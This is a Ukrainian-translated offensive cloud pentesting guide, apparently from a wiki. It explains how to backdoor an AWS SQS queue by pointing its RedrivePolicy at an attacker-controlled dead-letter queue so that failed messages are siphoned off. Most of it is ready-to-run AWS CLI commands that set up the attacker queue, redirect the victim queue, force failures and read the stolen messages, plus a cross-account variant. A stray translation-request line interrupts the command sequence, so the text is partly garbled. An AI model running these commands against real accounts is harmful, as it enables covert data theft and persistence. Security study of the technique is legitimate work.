AWS - SQS DLQ Backdoor Persistence via RedrivePolicy/RedriveAllowPolicy

Reading time: 4 minutes

Зловживайте SQS Dead-Letter Queues (DLQs), щоб таємно відбирати дані з вихідної черги жертви, вказавши її RedrivePolicy на чергу, контрольовану атакуючим. При низькому maxReceiveCount та шляхом ініціювання або очікування звичайних збоїв обробки, повідомлення автоматично перенаправляються до DLQ атакуючого без зміни producers або Lambda event source mappings.

Зловживані дозволи

• sqs:SetQueueAttributes на вихідній черзі жертви (щоб встановити RedrivePolicy)
• sqs:SetQueueAttributes на DLQ атакуючого (щоб встановити RedriveAllowPolicy)
• Опціонально для прискорення: sqs:ReceiveMessage на вихідній черзі
• Опціонально для налаштування: sqs:CreateQueue, sqs:SendMessage

Потік у тому ж акаунті (allowAll)

Підготовка (обліковий запис атакуючого або скомпрометований principal):

REGION=us-east-1
# 1) Create attacker DLQ
ATTACKER_DLQ_URL=$(aws sqs create-queue --queue-name ht-attacker-dlq --region $REGION --query QueueUrl --output text)
ATTACKER_DLQ_ARN=$(aws sqs get-queue-attributes --queue-url "$ATTACKER_DLQ_URL" --region $REGION --attribute-names QueueArn --query Attributes.QueueArn --output text)

# 2) Allow any same-account source queue to use this DLQ
aws sqs set-queue-attributes \
--queue-url "$ATTACKER_DLQ_URL" --region $REGION \
--attributes '{"RedriveAllowPolicy":"{\"redrivePermission\":\"allowAll\"}"}'

Виконання (запустити від імені скомпрометованого принципала в обліковому записі жертви):

# 3) Point victim source queue to attacker DLQ with low retries
VICTIM_SRC_URL=<victim source queue url>
ATTACKER_DLQ_ARN=<attacker dlq arn>
aws sqs set-queue-attributes \
--queue-url "$VICTIM_SRC_URL" --region $REGION \
--attributes '{"RedrivePolicy":"{\"deadLetterTargetArn\":\"'"$ATTACKER_DLQ_ARN"'\",\"maxReceiveCount\":\"1\"}"}'

Прискорення (необов'язково):

# 4) If you also have sqs:ReceiveMessage on the source queue, force failures
for i in {1..2}; do \
aws sqs receive-message --queue-url "$VICTIM_SRC_URL" --region $REGION \
--max-number-of-messages 10 --visibility-timeout 0; \
done

Надайте, будь ласка, вміст файлу src/pentesting-cloud/aws-security/aws-persistence/aws-sqs-persistence/aws-sqs-dlq-backdoor-persistence.md для перекладу.

# 5) Confirm messages appear in attacker DLQ
aws sqs receive-message --queue-url "$ATTACKER_DLQ_URL" --region $REGION \
--max-number-of-messages 10 --attribute-names All --message-attribute-names All

Приклад доказів (атрибути включають DeadLetterQueueSourceArn):

{
"MessageId": "...",
"Body": "...",
"Attributes": {
"DeadLetterQueueSourceArn": "arn:aws:sqs:REGION:ACCOUNT_ID:ht-victim-src-..."
}
}

Cross-Account Variant (byQueue)

Встановіть RedriveAllowPolicy на attacker DLQ, щоб дозволяти лише конкретні victim source queue ARNs:

VICTIM_SRC_ARN=<victim source queue arn>
aws sqs set-queue-attributes \
--queue-url "$ATTACKER_DLQ_URL" --region $REGION \
--attributes '{"RedriveAllowPolicy":"{\"redrivePermission\":\"byQueue\",\"sourceQueueArns\":[\"'"$VICTIM_SRC_ARN"'\"]}"}'

Вплив

• Сховане, стійке data exfiltration/persistence шляхом автоматичного перенаправлення невдалих повідомлень із вихідної черги SQS жертви в attacker-controlled DLQ, з мінімальним операційним шумом і без змін у producers або Lambda mappings.